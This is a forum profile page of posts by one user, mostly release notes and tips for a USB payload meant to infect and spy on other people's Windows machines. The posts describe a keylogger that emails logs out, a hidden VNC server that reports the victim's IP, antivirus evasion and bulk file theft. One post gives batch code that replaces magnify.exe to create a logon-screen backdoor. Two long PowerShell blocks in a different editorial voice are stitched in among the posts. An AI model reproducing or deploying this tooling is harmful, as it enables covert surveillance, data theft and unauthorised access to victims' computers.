Leapo

Everything posted by Leapo

  1. I'm working on modding the USB wiretap to email logs off daily; is that what you're looking for?
  2. UPDATE: VERSION 0.6.2.3 IS OUT! This is a quick experimental release for you all to try out. I've made some major changes that, by all accounts, should work just fine. I haven't actually had a chance to try this, so if you're looking for a release that's sure to work, refer to my previous post with the last stable release (Version 0.6.2.1). I won't be appending this version to the front page until I'm sure I have all the kinks worked out. Like I said, it should work just fine, but for all I know I broke the whole works.

     Keylogger - NEW FEATURE
     I've heavily modified the USB wiretap and added a few new features to it. When activated in Start.bat, it installs in the same manner as the USB hacksaw and begins logging keystrokes as soon as the current user logs off and logs back on (I'm working on a way to make it start without a relog). You may either run the payload again to collect logs, or give it your email address and it will email you the logs daily (just like the hacksaw).

     Silent Operation - OVERHAULED
     I found a nifty little app on the MSFN forums created for the sole purpose of hiding command prompts. I realize that nircmd has quite a few more features over this new app, but there's a major upside: this new app isn't detected by ANY antivirus as a hacktool, which means more of the payload will now run on systems that kill nircmd. I also fixed a small bug where the start.bat command prompt would pop up when starting the payload from the autorun dialog box.

     DOWNLOAD THE USB POCKET KNIFE V0.6.2.3
     Keep in mind, this release is experimental! If you want the latest stable release, go back a page and grab 0.6.2.1!
     Download Mirrors: RapidShare, Megaupload
     Note: this new version is NOT compatible with the U3 ISO in my first post as of yet. I'm putting together a few different versions of the launcher ISO, so watch out for that.
  3. I ran across this little gem a couple of days ago, anybody have any experience with it? Looks like it might be a great alternative to nircmd for hiding console windows: http://www.msfn.org/board/index.php?showtopic=49184
  4. Slight problem with 110mb.com, they aren't accepting registrations until the 14th due to a server move. EDIT: ok, their registration is up, but what we want to do borders on violating their TOS (which means perma-ban and, if they deem necessary, being reported to the authorities). Got a looser hosting service we can use?
  5. Yeah, that's one of the few downsides to running the payload off of the U3 partition. You could make an app that updates the image and automatically re-flashes it, but that's kind of a pain in the ass. And yeah, let's get that server set up, it'll be a great resource for all the payloads in development here. How should we go about this, you want me to just go ahead and register with them now?
  6. Yeah, I want to give that a shot, I just need to get a server set up that I can let everybody who uses my payload access for updates. I was thinking of setting up a free site at 50megs.com since all I need is FTP access to a few text files...think that'll be enough?
  7. There's a little more to it than just wget commands, as the files come down zipped, and there's extra garbage in the zip files we don't want. This is the general breakdown:
     - Wget goes out and downloads all the files.
     - The CLI version of 7zip extracts everything into a temp folder.
     - Files are copied to the proper locations.
     - Attribute flags are set for the new files (read only, hidden, system).
     Works pretty darn well, except in situations where the download link changes with version number. There's no good way to feed Wget a wildcard, so I have to manually tell it to poll the website for versions that might not exist yet (as is the case with pwdump). It works fantastically for programs where the download link stays the same, though.
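The download, extract, copy and set-attributes sequence described in the post above, written out as an added PowerShell example. This is not the thread's own updater (that one drives wget and the 7-Zip command-line tool from a batch file); it is editor-supplied code that shows the same loop and adds the two things the post's approach either struggles with or skips. The "download link changes with the version number" problem is handled by probing a list of candidate versions and keeping the highest one that actually exists, and every archive is pinned to an expected SHA-256 so an unauthenticated download from a mirror cannot silently swap a tool out from under the payload. All URLs, version numbers, hashes and the destination folder are placeholders; the Probe parameter exists so the version search can be exercised without network access.

```powershell
# Added example, not the thread's updater: download / extract / copy / set attributes,
# plus version probing and hash pinning. Every URL, hash and path here is a placeholder.

function Find-LatestToolUrl {
    param(
        [Parameter(Mandatory)][string]$Template,       # '{0}' is replaced by the version string
        [Parameter(Mandatory)][version[]]$Candidates,  # versions worth trying, in any order
        # Returns $true if the URL exists. Default is an HTTP HEAD request; it is a
        # parameter so the search itself can be tested without touching the network.
        [scriptblock]$Probe = {
            param([string]$Url)
            try { (Invoke-WebRequest -Uri $Url -Method Head -UseBasicParsing -TimeoutSec 10).StatusCode -eq 200 }
            catch { $false }
        }
    )
    # Newest first, so the first hit is the latest version that is really published.
    foreach ($v in ($Candidates | Sort-Object -Descending)) {
        $url = $Template -f $v.ToString()
        if (& $Probe $url) { return [pscustomobject]@{ Version = $v; Url = $url } }
    }
    return $null
}

function Install-ToolUpdate {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$ExpectedSha256,  # pin taken from the publisher, not from the mirror
        [Parameter(Mandatory)][string]$Destination,     # folder inside the payload
        [string[]]$Keep = @('*.exe', '*.dll')           # leave the readme / licence "garbage" behind
    )
    $temp = Join-Path ([IO.Path]::GetTempPath()) ('update-' + [guid]::NewGuid().ToString('N'))
    New-Item -ItemType Directory -Path $temp | Out-Null
    try {
        $zip = Join-Path $temp 'download.zip'
        Invoke-WebRequest -Uri $Url -OutFile $zip -UseBasicParsing

        # Refuse the archive unless it matches the pinned hash.
        $actual = (Get-FileHash -Algorithm SHA256 -Path $zip).Hash
        if ($actual -ne $ExpectedSha256.ToUpperInvariant()) {
            throw "Hash mismatch for ${Url}: expected $ExpectedSha256, got $actual"
        }

        $extract = Join-Path $temp 'extracted'
        Expand-Archive -Path $zip -DestinationPath $extract -Force
        New-Item -ItemType Directory -Path $Destination -Force | Out-Null

        $installed = @()
        foreach ($file in Get-ChildItem -Path $extract -Recurse -File -Include $Keep) {
            $target = Join-Path $Destination $file.Name
            # Clear the flags from a previous install so the old copy can be overwritten.
            if (Test-Path -Path $target) { [IO.File]::SetAttributes($target, [IO.FileAttributes]::Normal) }
            Copy-Item -Path $file.FullName -Destination $target -Force
            # The same three flags the post sets on new files.
            [IO.File]::SetAttributes($target, [IO.FileAttributes]'ReadOnly, Hidden, System')
            $installed += $target
        }
        return $installed
    }
    finally {
        Remove-Item -Path $temp -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Offline demonstration of the version search against a constructed "what exists" list:
# 1.2 has not been published yet, so the search must settle on 1.1.
$exists = @('https://example.invalid/tool-1.1.zip', 'https://example.invalid/tool-1.0.zip')
$search = @{
    Template   = 'https://example.invalid/tool-{0}.zip'
    Candidates = '1.0', '1.1', '1.2'
    Probe      = { param($Url) $exists -contains $Url }
}
$latest = Find-LatestToolUrl @search
"Latest available: $($latest.Version) at $($latest.Url)"

# Real use (network required; hash and destination are placeholders):
# $latest = Find-LatestToolUrl -Template 'https://example.invalid/tool-{0}.zip' -Candidates '1.0', '1.1', '1.2'
# Install-ToolUpdate -Url $latest.Url -ExpectedSha256 '<pinned sha256>' -Destination 'X:\Tools'
```

The probe loop is the honest version of "poll the website for versions that might not exist yet": it costs one HEAD request per candidate and stops at the first real one, so a too-long candidate list only wastes a few requests. The hash pin is the part worth keeping even if the rest is thrown away; a batch-and-wget updater that installs whatever a download mirror serves is a supply-chain hole in the payload itself.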
  8. UPDATE: VERSION 0.6.2.1 IS OUT! Ok guys, you've been waiting a LONG time, but here it is, my lazy ass is finally releasing a new version of my payload. I've made some insanely cool new features that, as far as I know, are brand new and never-before-seen. Quick update list (I'll be revising the first post in this thread shortly and making a wiki page):

     VNC install method - OVERHAULED
     I had heard some were having issues with the way I was installing VNC, so I went ahead and plugged in a new variant of the VNC installer. Password is still "yougothacked", and it's open on port 80 as well as 5900. Once configured properly with your gmail account, it will also email you the external IP of the infected system.

     Backup and Restore script - OVERHAULED
     Narrowed down the amount of items being backed up and restored, optimized the restore process, and used a lower compression value on the archive to make restoring from it quicker.

     Automatic Updates - NEW FEATURE
     Yes, you read that right. I've created a single simple script that will download the latest versions of many of the tools used on the switchblade, extract them, and install them into the payload automatically. After the update process has finished, the extra files are cleaned up and the backup archive is rebuilt.

     Automatically Compress Logs - NEW FEATURE
     I've added a switch in Start.bat that, when enabled, will automatically compress log files as they are generated to save space on your flash drive. Not all that useful if log files are all you're collecting, but if you're slurping files, this should let you store a bit more data.

     Centralized Management Interface - NEW FEATURE
     Most that have used my payload know about the slew of batch files that were appearing on the root of the drive to run various functions, and how messy it was beginning to look; fear not, for that little problem has been rectified once and for all! There's now just one batch file called Menu.bat which will assist you in all of your management needs. This simple GUI allows you to do any of the following:
     - Open Start.bat with Notepad++ (included with my payload, can be found in X:\Documents\Notepad)
     - Force a manual backup of the flash drive.
     - Force a manual restore of the flash drive.
     - Run the Auto-Update script described above.
     - Run the payload.
     - Drop back to the normal command line.

     DOWNLOAD THE USB POCKET KNIFE V0.6.2.1
     Yes, I know the version number took a jump, I've been working on this for a while, just go with it :P
     Download Mirrors: RapidShare, Megaupload
     Note: this new version is NOT compatible with the U3 ISO in my first post as of yet, that will be fixed shortly.
  9. Oh my god, you were right, the cake WAS a lie :shock: (To everybody who doesn't get the joke, go on STEAM and buy The Orange Box now)
  10. Ok, I simpsonized myself...then took it into photoshop, enlarged it, cleaned it up, and made it look half way decent.
  11. Leapo

    System Specs

    Just going to list my desktop, file server, and laptop...

    Desktop Gaming PC
    CASE: Lian-Li PC 65b (modded to accommodate all 120mm fans)
    CPU: AMD Athlon 64 3400+ @ 2.7GHz (Socket 754, Venice core, 512KB L2 cache)
    RAM: 2GB (2x1024MB)
    M/B: EPoX 8NPA SLI
    GFX: Nvidia GeForce 8800GTS 320MB @ 680MHz core, 1800MHz RAM
    HDD: Around 800GB total drive space
    DVD: Pioneer 16x DVD+-RW DL
    O/S: MS Windows XP Home

    Gaming Laptop
    Model: Everex XT5000T
    Product Link: http://www.everex.com/products/xt5000t/xt5000t.htm
    Newegg Link: http://www.newegg.com/Product/Product.aspx...amp;Tpk=xt5000t
    HDD Upgrade: second internal 100GB drive (not running RAID, though it is supported)
    RAM Upgrade: second 1GB stick
    GFX Upgrade: 7600Go 256MB overclocked to 7600GT speeds

    File Server
    CASE: Thermaltake Centurion
    CPU: AMD Athlon XP 1300+ @ 1.3GHz (Socket A, Palermo core, 256KB L2 cache)
    RAM: 512MB (2x256MB)
    M/B: PC Chips generic brand
    GFX: Nvidia GeForce 2 MX400
    HDD: 4.3TB total drive space
    DVD: 8X generic DVD-ROM
    O/S: MS Windows Server 2003
  12. that works, but isn't it a tad bloated and overcomplicated? The way I wrote it up doesn't need to search every drive in the system to work...
  13. Heh, interesting way of doing it...why not just let it create the standard log files (no need to edit go.bat), then make a second batch file (launched by start.bat) that emails those logs? same result, no need to edit an existing component...you know what, I'll add the option to email all generated logs to the default pocket knife
  14. Yes, yes, I know my payload appears dead, but I am still playing with it. A fully U3 version is being worked on, and I have a small update to the non-U3 payload that I could probably release this weekend (a GUI to change settings). The U3 version will have everything moved over to the CD partition, and I've improved the RAR script on the non-U3 version so the backups are smaller and take less time to extract. Don't count me out yet, I'm also cannibalizing GonZor's payload and adding everything I don't have from it to both versions of my payload....sure my code isn't as clean, but meh, now that it has a GUI, that isn't a huge issue. I might go ahead and release "streamlined" variations of my payload, with all the human-friendly formatting and comments removed so that the files are smaller, run faster, and backup/restore faster. Yeah, I'll release the updated non-U3 version tomorrow morning, so watch out for that :)
  15. Wouldn't be that hard, really. All that's required is a DOS boot floppy (or CD) with an NTFS driver that automatically runs a batch file that replaces Magnify.exe with your modified version. Insert floppy (or bootable CD) > boot machine > script runs > reboot into Windows > use exploit.

     Edit: Here's all the code that's required for the batch file:

         :: keep the original so it can be put back later
         copy C:\WINDOWS\system32\magnify.exe C:\WINDOWS\system32\magnify_bak.exe
         del C:\WINDOWS\system32\magnify.exe
         :: the modified magnify.exe sits next to this batch file on the boot media
         copy .\magnify.exe C:\WINDOWS\system32
         exit

     And this will undo it:

         del C:\WINDOWS\system32\magnify.exe
         copy C:\WINDOWS\system32\magnify_bak.exe C:\WINDOWS\system32\magnify.exe
         del C:\WINDOWS\system32\magnify_bak.exe
         exit

     Yes, I know I could have used "ren" instead of "copy" and "del", but I've had issues doing it that way without actually changing to the working directory. This will work for sure.
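The swap in the post above only needs physical access to an unencrypted disk: boot something else, overwrite a signed Microsoft binary that the logon screen can launch, reboot. The practitioner's side of that is noticing when it has been done, so here is an added PowerShell audit for it. This is editor-supplied example code, not anything from the thread. It checks magnify.exe (the binary the post names) and, as an assumption that the same trick applies to every accessibility helper reachable from the logon screen, the other helpers in that class. For each one it reports a copy that is byte-identical to cmd.exe, a missing or invalid Authenticode signature, or an Image File Execution Options Debugger value, which is the registry-only variant of the same hijack. It assumes Windows 8 or later with PowerShell 5; on Windows 7 and earlier, catalog-signed system files report NotSigned from Get-AuthenticodeSignature, so there the hash comparison against a known-good copy is the check that counts.

```powershell
# Added example, not from the thread: audit the pre-logon accessibility binaries for the
# kind of offline replacement described in the post. Run from an elevated prompt.
$System32 = Join-Path $env:windir 'System32'
# magnify.exe is the one the post names; the rest are an assumption that the same
# swap works for any helper the logon screen will launch.
$Targets  = 'magnify.exe', 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'DisplaySwitch.exe'
$IfeoKey  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Hash of the binary most often dropped in place of a helper (a renamed cmd.exe).
$CmdHash = (Get-FileHash -Algorithm SHA256 -Path (Join-Path $System32 'cmd.exe')).Hash

function Test-AccessibilityBinary {
    param([Parameter(Mandatory)][string]$Name)

    $path     = Join-Path $System32 $Name
    $findings = @()

    if (-not (Test-Path -Path $path)) {
        return [pscustomobject]@{ Name = $Name; Path = $path; Sha256 = $null; Findings = @('file missing') }
    }

    # 1. Replaced with a renamed cmd.exe, the classic form of this backdoor.
    $hash = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
    if ($hash -eq $CmdHash) { $findings += 'byte-identical to cmd.exe' }

    # 2. Microsoft ships these signed. Anything other than a valid Microsoft signature is
    #    suspicious. Caveat: Windows 7 and earlier report catalog-signed files as NotSigned
    #    here, so on those systems rely on the hash against a known-good copy instead.
    $sig = Get-AuthenticodeSignature -FilePath $path
    if ($sig.Status -ne 'Valid') {
        $findings += "signature status $($sig.Status)"
    } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
        $findings += "signed by $($sig.SignerCertificate.Subject)"
    }

    # 3. The online variant of the same hijack: an IFEO Debugger value makes Windows start
    #    the "debugger" instead of the helper, with no file on disk touched at all.
    $ifeo = Join-Path $IfeoKey $Name
    if (Test-Path -Path $ifeo) {
        $debugger = (Get-ItemProperty -Path $ifeo -ErrorAction SilentlyContinue).Debugger
        if ($debugger) { $findings += "IFEO Debugger = $debugger" }
    }

    [pscustomobject]@{ Name = $Name; Path = $path; Sha256 = $hash; Findings = $findings }
}

$report   = $Targets | ForEach-Object { Test-AccessibilityBinary -Name $_ }
$flagged  = $report | Where-Object { $_.Findings.Count -gt 0 }
if ($flagged) { $flagged | Format-List Name, Path, Sha256, Findings } else { 'No findings.' }
```

A magnify.exe swapped the way the post describes shows up under finding 1 or 2 (or both), and the restore batch in the post clears it again. The audit says nothing about why the file changed, so a hit on a freshly patched machine is worth checking against Windows Update before anyone panics; a hit on a machine that has not been patched is the interesting case.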
  16. Darn, slight miscalculation on my part. Now I've got to figure out a good way to combine the two...
  17. Who cares about the dudes shriveled penis, has nobody noticed the highly disturbing noodle monster???
  18. The current Winrar script works well enough, but yeah, TrueCrypt will provide the be-all end-all solution. As for community help...there are still those code snippets I posted up that are royally b0rked, if somebody could sort those out I would immediately throw up a new version of my payload (still based on the old code branch you've all been using, it will take a while yet to sort out all the bugs with the U3 version).
  19. Just a little update, I'm not dead! My U3 drive is here and I'm working on converting my code over to be completely U3 compatible (files in danger of being deleted on the U3 partition). You can expect a non-U3 variation using TrueCrypt very shortly after the U3 version is done. Everybody just hang on, I'll get this sorted eventually 8)
  20. Ok, we have a few things to go over here. When you "comment something out", you're telling the computer to ignore a specific command and continue down to the next thing that isn't commented out. You'll probably notice all of my batch file comments have a "::" before them; this is so my comments aren't read when my code is executed. You can also use :: to disable certain aspects of my batch files by simply adding :: in front of the code you want disabled. You may also want to go back and thoroughly read the included readme, as it appears you may have skipped a bit. For my payload, when you want to disable something, you don't need to edit the individual batch files; everything is controlled from within Start.bat (which is also fully commented). Navigate to WIPCMD and edit Start.bat by commenting out the lines that start fc_slurp and fc_slurp2.bat. Here's what the section of Start.bat pertaining to file slurping should look like after you've commented out the entries:

         :: Slurps smaller files like logs, chat logs, bookmarks, etc from the target. This component
         :: of slurp should be safe to run on smaller storage devices and flash drives, because it
         :: shouldn't need to copy anything larger than a log file.
         ::
         :: In any case, keep in mind it'll probably take a while to copy over everything (a few minutes).
         ::nircmd execmd CALL .\fc_slurp.bat

         :: Slurps everything in the My Documents, Shared Documents, and the desktop (includes sub-folders).
         :: This second component of slurp will most likely copy a LOT of large files to the switchblade.
         ::
         :: This is turned on by default, but you might want to disable this if you're not running from a
         :: decently large storage device (like an external hard disk).
         ::
         :: In any case, keep in mind it'll probably take a while to copy over everything (depending on what
         :: the target has stored in their My Documents folder).
         ::nircmd execmd CALL .\fc_slurp2.bat

     As simple as that, all I did was add a :: to the lines that started the batch files.
  21. Notice that after all that, if he had simply tried pulling it would have swung right open...
  22. Ok now, be honest, you didn't make that
  23. I like it Aingeal! May I ask what visual style you're using (looks sorta plex-ish)?
  24. I would gladly make it into a flash animation with sound if the crew were to record their voices
  25. Same as last time for the most part, new wallpaper (This is XP, not Vista)